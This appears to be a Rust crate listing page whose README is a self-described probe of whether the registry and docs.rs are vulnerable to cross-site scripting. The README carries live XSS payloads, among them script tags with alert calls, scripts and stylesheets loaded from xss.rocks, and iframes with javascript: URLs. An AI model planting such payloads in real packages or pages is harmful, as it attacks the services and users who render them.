6 releases

Uses old Rust 2015

0.1.5	Dec 27, 2017
0.1.4	Dec 27, 2017

#6 in #xss

ISC license

8KB

Testing for JS injection

Try a meta tag

This crate is just a test, I'm trying to find if cargo.io and/or docs.rs may be vulnerable to XSS.

Try to hover this image

Try to execute javascript with src attr in img tag

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT SRC=http://xss.rocks/xss.js?< B ></SCRIPT> <SCRIPT SRC=//xss.rocks/.j> <iframe src=http://xss.rocks/scriptlet.html <</iframe>
<STYLE>@import'http://xss.rocks/xss.css';</STYLE> <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

Try to click this anchor

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

dummy-test-xss

6 releases

Testing for JS injection

Try to click this anchor

No runtime deps